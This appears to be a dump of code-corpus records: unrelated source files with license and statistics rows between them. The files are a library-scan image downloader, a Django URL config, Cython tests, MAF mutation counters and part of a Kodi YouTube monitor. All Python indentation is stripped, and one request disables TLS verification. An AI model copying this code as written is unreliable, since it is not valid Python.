MAX_TILE_NUMBER = 100
def guess_tiles_number_x(url_maker):
tiles_number_x = 0
for tiles_number_x in range(MAX_TILE_NUMBER):
probable_url = url_maker(tiles_number_x, 0)
if probable_url is None:
break
head_response = requests.get(probable_url)
if head_response.status_code != 200:
break
return tiles_number_x
def guess_tiles_number_y(url_maker):
tiles_number_y = 0
for tiles_number_y in range(MAX_TILE_NUMBER):
probable_url = url_maker(0, tiles_number_y)
if probable_url is None:
break
head_response = requests.head(probable_url)
if head_response.status_code != 200:
break
return tiles_number_y
###################
#TILE BASED DOWNLOADERS
###################
@opster.command()
def gallica(
id=("", "", "Id of the book to be downloaded (e. g. 'btv1b7200356s')")
):
"""
Downloads book from https://gallica.bnf.fr/
"""
manifest_url = f"https://gallica.bnf.fr/iiif/ark:/12148/{id}/manifest.json"
output_folder = make_output_folder("gallica", id)
download_book_from_iiif(manifest_url, output_folder)
@opster.command()
def encyclopedie(
volume=("", "", "Volume to be downloaded (e. g. '24')"),
page=("", "", "Page number to be downloaded (e. g. '247')")
):
"""
Downloads single image from http://enccre.academie-sciences.fr/encyclopedie
"""
volume = int(volume)
page = int(page)
#there is no manifest.json file, slightly modified IIIF protocol is being used by the website
image_list_url = f"http://enccre.academie-sciences.fr/icefront/api/volume/{volume}/imglist"
image_list_metadata = get_json(image_list_url)
image_metadata = image_list_metadata[page]
image_url = f"http://enccre.academie-sciences.fr/digilib/Scaler/IIIF/{image_metadata['image']}"
output_file = f"{page:04d}.bmp"
download_image_from_iiif(image_url, output_file)
@opster.command()
def vatlib(
id=("", "", "Id of the book to be downloaded (e. g. 'MSS_Cappon.203')")
):
"""
Downloads book from http://digi.vatlib.it/
"""
manifest_url = f"http://digi.vatlib.it/iiif/{id}/manifest.json"
output_folder = make_output_folder("vatlib", id)
download_book_from_iiif(manifest_url, output_folder)
@opster.command()
def mecklenburgVorpommern(
id=("", "", "Id of the book to be downloaded (e. g. 'PPN880809493')")
):
"""
Downloads book from http://www.digitale-bibliothek-mv.de
"""
# it looks like Mecklenburg-Vorpommern does not use manifest.json
output_folder = make_output_folder("mecklenburg_vorpommern", id)
for page in range(1, 1000):
output_filename = make_output_filename(output_folder, page)
if os.path.isfile(output_filename):
print(f"Skipping existing page {page}")
continue
try:
base_url = f"http://www.digitale-bibliothek-mv.de/viewer/rest/image/{id}/{page:08d}.tif"
download_image_from_iiif(base_url, output_filename)
except ValueError:
break
@opster.command()
def prlib(
id=("", "", "Book id to be downloaded (e. g. '20596C08-39F0-4E7C-92C3-ABA645C0E20E')"),
secondary_id=("", "", "Secondary id of the book (e. g. '5699092')"),
page=("p", "", "Download specified (zero-based) page only"),
):
"""
Downloads book from https://www.prlib.ru/
"""
metadata_url = f"https://content.prlib.ru/metadata/public/{id}/{secondary_id}/{id}.json"
files_root = f"/var/data/scans/public/{id}/{secondary_id}/"
fastcgi_url = "https://content.prlib.ru/fcgi-bin/iipsrv.fcgi"
output_folder = make_output_folder("prlib", id)
if page:
page = int(page)
output_filename = make_output_filename(output_folder, page)
metadata = get_json(metadata_url)
page_metadata = metadata[page]
remote_filename = os.path.join(files_root, page_metadata["f"])
download_image_from_iip(fastcgi_url, remote_filename, page_metadata, output_filename)
else:
download_book_from_iip(
metadata_url=metadata_url,
fastcgi_url=fastcgi_url,
files_root=files_root,
output_folder=output_folder
)
@opster.command()
def nga(
id=("", "", "Image id to be downloaded (e. g. `49035`)")
):
"""
Downloads single image from https://www.nga.gov
"""
slashed_image_id = "/".join(id) #will produce "4/9/0/3/5" from "49035-primary-0-nativeres"
remote_filename = f"/public/objects/{slashed_image_id}/{id}-primary-0-nativeres.ptif"
fastcgi_url="https://media.nga.gov/fastcgi/iipsrv.fcgi"
metadata = IIPMetadata.from_text(
get_text(f"{fastcgi_url}?FIF={remote_filename}&obj=Max-size&obj=Tile-size&obj=Resolution-number")
)
download_image_from_iip(
fastcgi_url=fastcgi_url,
remote_filename=remote_filename,
metadata=metadata,
output_filename=f"nga.{id}.bmp"
)
@opster.command()
def hab(
id=("", "", "Image id to be downloaded (e. g. `grafik/uh-4f-47-00192`)")
):
"""
Downloads single image from http://diglib.hab.de and http://kk.haum-bs.de
(both redirect to Virtuelles Kupferstichkabinett website, which is too hard to be typed)
"""
#The site does not use any metadata and simply sends unnecessary requests to backend
#Using head requests to get maximum available zoom and
class UrlMaker(object):
def __init__(self, zoom):
self.zoom = zoom
def __call__(self, tile_x, tile_y):
for tile_group in [0, 1, 2]:
probable_url = f"http://diglib.hab.de/varia/{id}/TileGroup{tile_group}/{self.zoom}-{tile_x}-{tile_y}.jpg"
head_response = requests.head(probable_url)
if head_response.status_code == 200:
return probable_url
return None
MAX_ZOOM = 10
TILE_SIZE = 256
max_zoom = None
for test_zoom in range(MAX_ZOOM + 1):
if UrlMaker(test_zoom)(0, 0) is not None:
max_zoom = test_zoom
else:
#current zoom is not available - consider previous one to be maximal
break
assert(max_zoom is not None)
print(f"Guessed max_zoom={max_zoom}")
#The site does not use any metadata and simply sends unnecessary requests to backend
#Guessing tiles_number_x, tiles_number_y using HEAD requests with guessed max_zoom
#
#UrlMaker returns None when corresponding tile does not exist
#
#FIXME: one can save some requests using bisection here,
#but python standard library is too poor to have one
url_maker = UrlMaker(max_zoom)
tiles_number_x = guess_tiles_number_x(url_maker)
print(f"Guessed tiles_number_x={tiles_number_x}")
tiles_number_y = guess_tiles_number_y(url_maker)
print(f"Guessed tiles_number_y={tiles_number_y}")
policy = TileSewingPolicy(tiles_number_x, tiles_number_y, TILE_SIZE)
output_filename = make_output_filename(id.replace("/", "."))
download_and_sew_tiles(output_filename, url_maker, policy)
@opster.command()
def yaleImage(
id=("", "", "Image id to be downloaded (e. g. `lwlpr11386`)")
):
"""
Downloads image from http://images.library.yale.edu/
"""
class UrlMaker(object):
"""
Similar to UrlMaker from hab() method. Should be deduplicated once
"""
def __init__(self, zoom):
self.zoom = zoom
def __call__(self, tile_x, tile_y):
for tile_group in [0, 1, 2]:
probable_url = f"http://images.library.yale.edu/walpoleimages/dl/011000/{id}/TileGroup{tile_group}/{self.zoom}-{tile_x}-{tile_y}.jpg"
head_response = requests.head(probable_url)
if head_response.status_code == 200:
return probable_url
return None
MAX_ZOOM = 5
#FIXME: replace 011000 with computed expression
metadata = ElementTree.fromstring(get_text(f"http://images.library.yale.edu/walpoleimages/dl/011000/{id}/ImageProperties.xml"))
width = int(metadata.attrib["WIDTH"])
height = int(metadata.attrib["HEIGHT"])
tile_size = int(metadata.attrib["TILESIZE"])
policy = TileSewingPolicy.from_image_size(width, height, tile_size)
output_filename = make_output_filename(id)
download_and_sew_tiles(output_filename, UrlMaker(MAX_ZOOM), policy)
@opster.command()
def yaleBook(
id=("", "", "Image id to be downloaded (e. g. `BRBL_Exhibitions/7/1327507/1327507`)")
):
"""
Downloads image from https://brbl-zoom.library.yale.edu
"""
modulo = id[-1]
output_filename = make_output_filename("", id)
remote_filename = f"BRBL_Exhibitions/{modulo}/{id}/{id}.jp2"
fastcgi_url = "https://brbl-zoom.library.yale.edu/fcgi-bin/iipsrv.fcgi"
metadata_url = f"{fastcgi_url}?FIF={remote_filename}&obj=Max-size&obj=Tile-size&obj=Resolution-number"
metadata = IIPMetadata.from_text(get_text(metadata_url))
download_image_from_iip(fastcgi_url, remote_filename, metadata, output_filename)
@opster.command()
def britishLibraryBook(
id=("", "", "Book id to be downloaded (e. g. `vdc_100026052453`, as it is displayed in the viewer url)")
):
"""
Downloads a book from http://explore.bl.uk
"""
output_folder = make_output_folder("bl", id)
manifest_url = f"https://api.bl.uk/metadata/iiif/ark:/81055/{id}.0x000001/manifest.json"
download_book_from_iiif(manifest_url, output_folder)
class DeepZoomUrlMaker(object):
def __init__(self, base_url, max_zoom, ext="jpg"):
self.base_url = base_url
self.max_zoom = max_zoom
self.ext = ext
def __call__(self, tile_x, tile_y):
return f"{self.base_url}/{self.max_zoom}/{tile_x}_{tile_y}.{self.ext}"
def download_image_from_deepzoom(output_filename, metadata_url, url_maker):
image_metadata = get_xml(metadata_url)
tile_size = int(image_metadata.attrib["TileSize"])
overlap = int(image_metadata.attrib["Overlap"])
size_metadata = image_metadata.getchildren()[0]
width = int(size_metadata.attrib["Width"])
height = int(size_metadata.attrib["Height"])
policy = TileSewingPolicy.from_image_size(width, height, tile_size)
policy.overlap = overlap
download_and_sew_tiles(output_filename, url_maker, policy)
@opster.command()
def leidenCollection(
id=("", "", "Image id of the painting to be downloaded(e. g. `js-108-jan_steen-the_fair_at_warmond_files`)")
):
"""
Downloads single image from https://www.theleidencollection.com
"""
MAX_ZOOM = 13
class UrlMaker(object):
def __call__(self, tile_x, tile_y):
return f"https://www.theleidencollection.com/LeidenCollectionSamples/images/{id}_files/{MAX_ZOOM}/{tile_x}_{tile_y}.jpg"
url_maker = UrlMaker()
tiles_number_x = guess_tiles_number_x(url_maker)
print(f"Guessed tiles_number_x={tiles_number_x}")
tiles_number_y = guess_tiles_number_y(url_maker)
print(f"Guessed tiles_number_y={tiles_number_y}")
policy = TileSewingPolicy(tiles_number_x, tiles_number_y, tile_size=None, overlap=None)
output_filename = make_output_filename("", id)
download_and_sew_tiles(output_filename, url_maker, policy)
@opster.command()
def britishLibraryManuscript(
id=("", "", "Page id of the manuscript to be downloaded (e. g. `add_ms_12531!1_f005r`)")
):
"""
Downloads single manuscript page from http://www.bl.uk/manuscripts/Default.aspx
"""
def parse_id(full_id):
manuscript_id, _, page_id = tuple(id.rpartition('_'))
return (manuscript_id, page_id)
manuscript_id, page_id = parse_id(id)
#WARN: here and below base_url and metadata_url have common prefix. One might save something
metadata_url = f"http://www.bl.uk/manuscripts/Proxy.ashx?view={id}.xml"
output_folder = make_output_folder("bl", manuscript_id)
output_filename = make_output_filename(output_folder, page_id)
MAX_ZOOM = 13
base_url = f"http://www.bl.uk/manuscripts/Proxy.ashx?view={id}_files"
url_maker = DeepZoomUrlMaker(base_url, MAX_ZOOM)
download_image_from_deepzoom(output_filename, metadata_url, url_maker)
@opster.command()
def makAt(
id=("", "", "Id of the image to be downloaded (e. g. `ki-6952-1_1`)")
):
"""
Downloads single image from https://sammlung.mak.at/
"""
metadata_url = f"https://sammlung.mak.at/img/zoomimages/publikationsbilder/{id}.xml"
output_filename = make_output_filename('.', id)
MAX_ZOOM = 11
base_url = f"https://sammlung.mak.at/img/zoomimages/publikationsbilder/{id}_files"
url_maker = DeepZoomUrlMaker(base_url, MAX_ZOOM)
download_image_from_deepzoom(output_filename, metadata_url, url_maker)
@opster.command()
def uniJena(
id=("", "", "Id of the image to be downloaded, including document id (e. g. `00108217/JLM_1787_H002_0003_a`)")
):
"""
Downloads single image from https://zs.thulb.uni-jena.de
Requires a lot of work though
"""
class UrlMaker(object):
def __init__(self, zoom):
self.zoom = zoom
def __call__(self, tile_x, tile_y):
return f"https://zs.thulb.uni-jena.de/servlets/MCRTileServlet/jportal_derivate_{id}.tif/{self.zoom}/{tile_y}/{tile_x}.jpg"
metadata_url = f"https://zs.thulb.uni-jena.de/servlets/MCRTileServlet/jportal_derivate_{id}.tif/imageinfo.xml"
metadata = get_xml(metadata_url)
output_filename = make_output_filename("", os.path.basename(id))
width = int(metadata.attrib["width"])
height = int(metadata.attrib["height"])
zoom = int(metadata.attrib["zoomLevel"])
TILE_SIZE = 256
policy = TileSewingPolicy.from_image_size(width, height, TILE_SIZE)
url_maker = UrlMaker(zoom)
download_and_sew_tiles(output_filename, url_maker, policy)
subprocess.check_call([
"convert",
output_filename,
"-crop", f"{width}x{height}+0+0",
output_filename
])
###################
#PAGE BASED DOWNLOADERS
###################
@opster.command()
def locMusdi(
id=("", "", "Id of the book to be downloaded (e. g. `056`)"),
start_from=("", 1, "The number of the first page in the sequence (defaults to 1)")
):
"""
Downloads book from Library of Congress Music/Dance instruction
"""
start_from = int(start_from)
# Some ids are known to be missing
MISSING_IDS = [
"050", "054", "057", "061", "071",
"078", "083", "095", "100", "103",
"106", "111", "116", "120", "135",
"152", "172", "173", "175", "176",
"180", "185", "192", "193", "196",
"206", "223", "231", "232", "234",
"238", "244", "249",
]
MAX_ID = 252
if len(id) != 3:
print("Expected id to have 3 digits. Please, recheck the ID.")
sys.exit(1)
if id in MISSING_IDS:
print(f"The book with id musdi.{id} is known to be missing. Please, recheck the ID.")
sys.exit(1)
if int(id) > MAX_ID:
print(f"The maximum id is musdi.{MAX_ID}. Please, recheck the ID.")
sys.exit(1)
output_folder = make_output_folder("locMusdi", id)
for page in range(start_from, 1000):
base_url = f"https://memory.loc.gov/music/musdi/{id}/{page:04d}"
url = None
for extension in ["tif", "jpg"]:
output_filename = make_output_filename(output_folder, page, extension=extension)
if os.path.exists(output_filename):
break
maybe_url = base_url + "." + extension
head_response = requests.head(maybe_url)
if head_response.status_code == http.client.OK:
url = maybe_url
break
if url is None:
break
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
print(f"Downloading page #{page:08d}")
get_binary(output_filename, url)
@opster.command()
def hathi(
id=("", "", "Id of the book to be downloaded (e. g. `wu.89005529961`)")
):
"""
Downloads book from http://www.hathitrust.org/
"""
output_folder = make_output_folder("hathi", id)
meta_url = f"https://babel.hathitrust.org/cgi/imgsrv/meta?id={id}"
metadata = get_json(meta_url)
total_pages = metadata["total_items"]
print(f"Going to download {total_pages} pages to {output_folder}")
for page in range(1, total_pages):
url = f"https://babel.hathitrust.org/cgi/imgsrv/image?id={id};seq={page};width=1000000"
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
print(f"Downloading page {page} to {output_filename}")
get_binary(output_filename, url)
@opster.command()
def vwml(
id=("", "", "Id of the book to be downloaded (e. g. `Wilson1808`)")
):
"""
Downloads book from https://www.vwml.org/topics/historic-dance-and-tune-books
"""
main_url = f"https://www.vwml.org/topics/historic-dance-and-tune-books/{id}"
main_markup = get_text(main_url)
soup = bs4.BeautifulSoup(main_markup, "html.parser")
output_folder = make_output_folder("vwml", id)
for page, thumbnail in enumerate(soup.find_all("img", attrs={"class": "image_thumb"})):
thumbnail_url = thumbnail.attrs["src"]
#IT'S MAGIC!
full_url = thumbnail_url.replace("thumbnails", "web")
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
print(f"Saving {full_url} to {output_filename}")
try:
get_binary(output_filename, full_url, verify=False)
except ValueError:
#VWML is known to have missing pages listed in this table.
#Ignoring such pages
pass
@opster.command()
def onb(
id=("", "", "Id of the book to be downloaded (e. g. `ABO_+Z178189508`)")
):
"""
Downloads book from http://onb.ac.at/
"""
# First, normalizing id
id = id.replace('/', '_')
if id.startswith("ABO"):
flavour = "OnbViewer"
elif id.startswith("DTL"):
flavour = "RepViewer"
else:
raise RuntimeError(f"Can not determine flavour for {id}")
# Second, obtaining JSESSIONID cookie value
viewer_url = f"http://digital.onb.ac.at/{flavour}/viewer.faces?doc={id}"
viewer_response = requests.get(viewer_url)
cookies = viewer_response.cookies
metadata_url = f"http://digital.onb.ac.at/{flavour}/service/viewer/imageData?doc={id}&from=1&to=1000"
metadata = get_json(metadata_url, cookies=cookies)
output_folder = make_output_folder("onb", id)
image_data = metadata["imageData"]
print(f"Going to download {len(image_data)} images")
for image in image_data:
query_args = image["queryArgs"]
image_id = image["imageID"]
image_url = f"http://digital.onb.ac.at/{flavour}/image?{query_args}&s=1.0&q=100"
output_filename = make_output_filename(output_folder, image_id, extension=None)
if os.path.isfile(output_filename):
print(f"Skip downloading existing image {image_id}")
continue
print(f"Downloading {image_id}")
get_binary(output_filename, image_url, cookies=cookies)
@opster.command()
def staatsBerlin(
id=("", "", "Id of the book to be downloaded (e. g. `PPN86902910X`)")
):
"""
Downloads book from http://digital.staatsbibliothek-berlin.de/
"""
output_folder = make_output_folder("staatsBerlin", id)
page = 1
while True:
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.isfile(output_filename):
print(f"Skipping existing page {page}")
else:
try:
image_url = f"http://ngcs.staatsbibliothek-berlin.de/?action=metsImage&metsFile={id}&divID=PHYS_{page:04d}"
#WARN:
# it looks like there is no normal way
# to get the number of pages in the book via http request
get_binary(output_filename, image_url)
except ValueError:
print(f"No more images left. Last page was {page - 1:04d}")
break
page += 1
@opster.command()
def polona(
id=("", "", "Base64-encoded id of the book to be downloaded (e. g. `Nzg4NDk0MzY`, can be found in permalink)")
):
"""
Downloads book from https://polona.pl
"""
entity_url = f"https://polona.pl/api/entities/{id}"
entity_metadata = get_json(entity_url)
output_folder = make_output_folder("polona", id)
for page, page_metadata in enumerate(entity_metadata["scans"]):
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
found = False
for image_metadata in page_metadata["resources"]:
if image_metadata["mime"] == "image/jpeg":
get_binary(output_filename, image_metadata["url"])
found = True
if not found:
raise Exception(f"JPEG file was not found in image_metadata for page {page}")
@opster.command()
def haab(
id=("", "", "Id of the book to be downloaded (e. g. `1286758696_1822000000/EPN_798582804`)")
):
"""
Downloads book from https://haab-digital.klassik-stiftung.de/
"""
def make_url(page):
return f"https://haab-digital.klassik-stiftung.de/viewer/rest/image/{id}_{page:04d}.tif/full/10000,10000/0/default.jpg"
output_folder = make_output_folder("haab", id)
page = 0
# HAAB server returns 403 for non-existing pages. First,
while True:
page_url = make_url(page)
head_response = requests.head(page_url)
if head_response.status_code == 200:
print(f"Found starting page {page:04d}")
break
page += 1
exception_count = 0
while True:
page_url = make_url(page)
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
page += 1
continue
try:
print(f"Downloading page #{page:08d}")
get_binary(output_filename, page_url)
page += 1
except ValueError as ex:
page += 1
#WARN:
# Certain pages can return 403 even in the middle of the book.
# Skipping certain number of such pages.
exception_count += 1
if exception_count < 10:
print(f"Got ValueError while getting page {page:08d}: {ex}")
continue
else:
print(f"Got exception while getting page {page:08d}: {ex}. Exception limit was reached, downloader will exit now.")
break
if __name__ == "__main__":
opster.dispatch()
|
gpl-3.0
| 1,744,960,985,823,110,000
| 31.074672
| 137
| 0.693922
| false
| 2.857425
| false
| false
| false
|
bczmufrn/frequencia
|
frequencia/urls.py
|
1
|
2221
|
"""frequencia URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.urls import path
from django.conf import settings
from django.contrib import admin
from django.conf.urls import include
from django.conf.urls.static import static
urlpatterns = [
path('', include('frequencia.core.urls', namespace='core')),
path('registro/', include('frequencia.registro.urls', namespace='registro')),
path('vinculos', include('frequencia.vinculos.urls', namespace='vinculos')),
path('calendario/', include('frequencia.calendario.urls', namespace='calendario')),
path('justificativas/', include('frequencia.justificativas.urls', namespace='justificativas')),
path('relatorios/', include('frequencia.relatorios.urls', namespace='relatorios')),
path('conta/', include('frequencia.accounts.urls', namespace='accounts')),
path('admin/', admin.site.urls),
]
# urlpatterns = [
# url(r'^', include('frequencia.core.urls', namespace='core')),
# url(r'^registro/', include('frequencia.registro.urls', namespace='registro')),
# url(r'^vinculos/', include('frequencia.vinculos.urls', namespace='vinculos')),
# url(r'^calendario/', include('frequencia.calendario.urls', namespace='calendario')),
# url(r'^justificativas/', include('frequencia.justificativas.urls', namespace='justificativas')),
# url(r'^relatorios/', include('frequencia.relatorios.urls', namespace='relatorios')),
# url(r'^admin/', admin.site.urls),
# url(r'^conta/', include('frequencia.accounts.urls', namespace='accounts')),
# ]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
mit
| 7,764,757,986,167,539,000
| 47.304348
| 99
| 0.70869
| false
| 3.354985
| false
| false
| false
|
AlexanderFabisch/cythonwrapper
|
test/test_type_conversions.py
|
1
|
4159
|
import numpy as np
from pywrap.testing import cython_extension_from
from nose.tools import assert_equal, assert_raises
def test_bool_in_bool_out():
with cython_extension_from("boolinboolout.hpp"):
from boolinboolout import A
a = A()
b = False
assert_equal(not b, a.neg(b))
def test_double_in_double_out():
with cython_extension_from("doubleindoubleout.hpp"):
from doubleindoubleout import A
a = A()
d = 3.213
assert_equal(d + 2.0, a.plus2(d))
def test_complex_arg():
with cython_extension_from("complexarg.hpp"):
from complexarg import A, B
a = A()
b = B(a)
assert_equal(b.get_string(), "test")
def test_map():
with cython_extension_from("map.hpp"):
from map import lookup
m = {"test": 0}
assert_equal(lookup(m), 0)
def test_vector():
with cython_extension_from("vector.hpp"):
from vector import A
a = A()
v = np.array([2.0, 1.0, 3.0])
n = a.norm(v)
assert_equal(n, 14.0)
def test_string_in_string_out():
with cython_extension_from("stringinstringout.hpp"):
from stringinstringout import A
a = A()
s = "This is a sentence"
assert_equal(s + ".", a.end(s))
def test_string_vector():
with cython_extension_from("stringvector.hpp"):
from stringvector import A
a = A()
substrings = ["AB", "CD", "EF"]
res = a.concat(substrings)
assert_equal(res, "ABCDEF")
def test_complex_ptr_arg():
with cython_extension_from("complexptrarg.hpp"):
from complexptrarg import A, B
a = A()
b = B(a)
assert_equal(b.get_string(), "test")
def test_factory():
with cython_extension_from("factory.hpp"):
from factory import AFactory
factory = AFactory()
a = factory.make()
assert_equal(5, a.get())
def test_primitive_pointers():
with cython_extension_from("primitivepointers.hpp"):
from primitivepointers import fun1
assert_equal(fun1(5), 6)
def test_cstring():
with cython_extension_from("cstring.hpp"):
from cstring import length, helloworld
assert_equal(length("test"), 4)
assert_equal(helloworld(), "hello world")
def test_fixed_length_array():
with cython_extension_from("fixedarray.hpp"):
from fixedarray import to_string
assert_equal(to_string([1, 2, 3, 4, 5]), "[1, 2, 3, 4, 5]")
assert_raises(ValueError, to_string, [1, 2, 3, 4])
assert_raises(TypeError, to_string, [1, 2, 3, 4, "a"])
def test_missing_default_ctor():
with cython_extension_from("missingdefaultctor.hpp", hide_errors=True):
assert_raises(ImportError, __import__, "missingdefaultctor")
def test_missing_assignment():
with cython_extension_from("missingassignmentop.hpp", hide_errors=True):
assert_raises(ImportError, __import__, "missingassignmentop")
def test_exceptions():
# A list of convertible exceptions can be found in the Cython docs:
# http://docs.cython.org/src/userguide/wrapping_CPlusPlus.html#exceptions
with cython_extension_from("throwexception.hpp"):
from throwexception import (throw_bad_alloc, throw_bad_cast,
throw_domain_error, throw_invalid_argument,
throw_ios_base_failure,
throw_out_of_range, throw_overflow_error,
throw_range_error, throw_underflow_error,
throw_other)
assert_raises(MemoryError, throw_bad_alloc)
assert_raises(TypeError, throw_bad_cast)
assert_raises(ValueError, throw_domain_error)
assert_raises(ValueError, throw_invalid_argument)
assert_raises(IOError, throw_ios_base_failure)
assert_raises(IndexError, throw_out_of_range)
assert_raises(OverflowError, throw_overflow_error)
assert_raises(ArithmeticError, throw_range_error)
assert_raises(ArithmeticError, throw_underflow_error)
assert_raises(RuntimeError, throw_other)
|
bsd-3-clause
| -8,130,951,337,650,966,000
| 31.24031
| 79
| 0.613369
| false
| 3.645048
| true
| false
| false
|
kotoroshinoto/TCGA_MAF_Analysis
|
gooch_maf_tools/util/MAFcounters.py
|
1
|
4909
|
import os
import sys
from ..formats import MAF
__author__ = 'mgooch'
class FeatureCounter:
def __init__(self):
self.counts = dict()
self.name = None
def count(self, entry: MAF.Entry):
return 0
def __appendcount__(self, keystring):
if keystring is None:
return
if keystring in self.counts:
self.counts[keystring] += 1
else:
self.counts[keystring] = 1
def __countif__(self, keystring, condition):
if condition:
self.__appendcount__(keystring)
def __str__(self):
str_val = ""
for key in sorted(self.counts.keys()):
str_val += "%s\t%s\n" % (key, self.counts[key])
return str_val
def write_file(self, path, prefix=None):
realpath = os.path.realpath(os.path.relpath(prefix, start=path))
if self.name is not None and len(self.name) > 0:
out_file_name = ""
if prefix is not None and len(prefix) > 0:
out_file_name = os.path.realpath(os.path.relpath("%s_%s.txt" % (prefix, self.name), start=path))
#$ofname=$path.'/'.$prefix.'_'.$self->{name}.".txt";
else:
out_file_name = os.path.realpath(os.path.relpath("%s.txt" % self.name, start=path))
#$ofname=$path.'/'.$self->{name}.".txt";
# print "$ofname\n";
out_file_handler = open(out_file_name, mode='w')
out_file_handler.write("%s" % self)
out_file_handler.close()
else:
print("writeFile used on counter with no name", file=sys.stderr)
sys.exit(-1)
class GeneMutCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
self.__appendcount__(entry.data['Hugo_Symbol'])
class LocMutCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
#count according to GENE_CHROM_START_END
self.__appendcount__("%s|%s|%s|%s" % (entry.data['Hugo_Symbol'], entry.data['Chrom'], entry.data['Start_Position'], entry.data['End_Position']))
def __str__(self):
str_rep = "GENE_SYMBOL\tCHROM\tSTART\tEND\tCOUNT\n"
for item in self.counts:
str_rep += "%s\t%d" % (item.replace("|", "\t"), self.counts[item])
str_rep += "\n"
return str_rep
class SampMutCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
self.__appendcount__(entry.data['Tumor_Sample_Barcode'])
# self.__appendcount__(entry.Tumor_Sample_UUID)
class MutTypeCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
mut_type_list = entry.determine_mutation()
for mut_type in mut_type_list:
self.__appendcount__(mut_type)
class MutTypeAtLocCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
mut_type_list = entry.determine_mutation()
for mut_type in mut_type_list:
self.__appendcount__("%s|%s|%s|%s|%s|%s|%s" % (entry.data['Hugo_Symbol'], entry.data['Chrom'], entry.data['Start_Position'], entry.data['End_Position'], entry.data['Variant_Type'], entry.data['Variant_Classification'], mut_type))
def __str__(self):
str_rep = "GENE_SYMBOL\tCHROM\tSTART\tEND\tMUT_TYPE\tVARIANT_TYPE\tVARIANT_CLASS\tCOUNT\n"
for item in self.counts:
str_rep += "%s\t%d" % (item.replace("|", "\t"), self.counts[item])
str_rep += "\n"
return str_rep
class MutTypePerSampCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
mut_type_list = entry.determine_mutation()
for mut_type in mut_type_list:
combin_str = "%s_|_%s" % (entry.data['Tumor_Sample_Barcode'], mut_type)
self.__appendcount__(combin_str)
@staticmethod
def prep_nuc_key_list():
nuc_characters = list("ACTG")
combo_keys = list()
for nuc1 in nuc_characters:
for nuc2 in nuc_characters:
if nuc1 != nuc2:
combo_keys.append(("%s_%s" % (nuc1, nuc2)))
combo_keys.append(("-_%s" % nuc1))
combo_keys.append(("%s_-" % nuc1))
combo_keys.append("MNC")
return combo_keys
@staticmethod
def initialize_sample_dictionary(sample_list):
nuc_keys = MutTypePerSampCounter.prep_nuc_key_list()
grid_dict = dict()
for sample in sample_list:
if sample not in grid_dict:
grid_dict[sample] = dict()
for key in nuc_keys:
grid_dict[sample][key] = 0
return grid_dict
def get_grid_dict(self):
samples = list()
split_entries = list()
for key in sorted(self.counts.keys()):
key_split = list(key.split('_|_'))
key_split.append(self.counts[key])
split_entries.append(key_split)
if key_split[0] not in samples:
samples.append(key_split[0])
grid_dict = MutTypePerSampCounter.initialize_sample_dictionary(samples)
for entry in split_entries:
grid_dict[entry[0]][entry[1]] = entry[2]
return grid_dict
def __str__(self):
str_val = ""
grid_dict = self.get_grid_dict()
nuc_keys = MutTypePerSampCounter.prep_nuc_key_list()
first_line = "sample_ID"
for nuc_pair in nuc_keys:
first_line += "\t" + nuc_pair
first_line += "\n"
for sample in grid_dict:
entry_str = str(sample)
for nuc_pair in nuc_keys:
entry_str += "\t" + str(grid_dict[sample][nuc_pair])
entry_str += "\n"
str_val += entry_str
# str_val += "%s\t%s\t%s\n" % (key_split[0], key_split[1], key_split[2])
return first_line + str_val
|
unlicense
| 4,157,340,140,636,658,700
| 30.06962
| 232
| 0.657975
| false
| 2.722684
| false
| false
| false
|
repotvsupertuga/tvsupertuga.repository
|
plugin.video.youtube/resources/lib/youtube_plugin/kodion/utils/monitor.py
|
1
|
2946
|
import threading
from ..utils import get_proxy_server, is_proxy_live
import xbmc
import xbmcaddon
_addon = xbmcaddon.Addon('plugin.video.youtube')
class YouTubeMonitor(xbmc.Monitor):
def __init__(self, *args, **kwargs):
self._proxy_port = int(_addon.getSetting('kodion.mpd.proxy.port'))
self._old_proxy_port = self._proxy_port
self._use_proxy = _addon.getSetting('kodion.mpd.proxy') == 'true'
self.dash_proxy = None
self.proxy_thread = None
if self.use_proxy():
self.start_proxy()
xbmc.Monitor.__init__(self)
def onSettingsChanged(self):
_use_proxy = _addon.getSetting('kodion.mpd.proxy') == 'true'
_proxy_port = int(_addon.getSetting('kodion.mpd.proxy.port'))
if self._use_proxy != _use_proxy:
self._use_proxy = _use_proxy
if self._proxy_port != _proxy_port:
self._old_proxy_port = self._proxy_port
self._proxy_port = _proxy_port
if self.use_proxy() and not self.dash_proxy:
self.start_proxy()
elif self.use_proxy() and (self.old_proxy_port() != self.proxy_port()):
if self.dash_proxy:
self.restart_proxy()
elif not self.dash_proxy:
self.start_proxy()
elif not self.use_proxy() and self.dash_proxy:
self.shutdown_proxy()
def use_proxy(self):
return self._use_proxy
def proxy_port(self):
return int(self._proxy_port)
def old_proxy_port(self):
return int(self._old_proxy_port)
def proxy_port_sync(self):
self._old_proxy_port = self._proxy_port
def start_proxy(self):
if not self.dash_proxy:
xbmc.log('[plugin.video.youtube] DashProxy: Starting |{port}|'.format(port=str(self.proxy_port())), xbmc.LOGDEBUG)
self.proxy_port_sync()
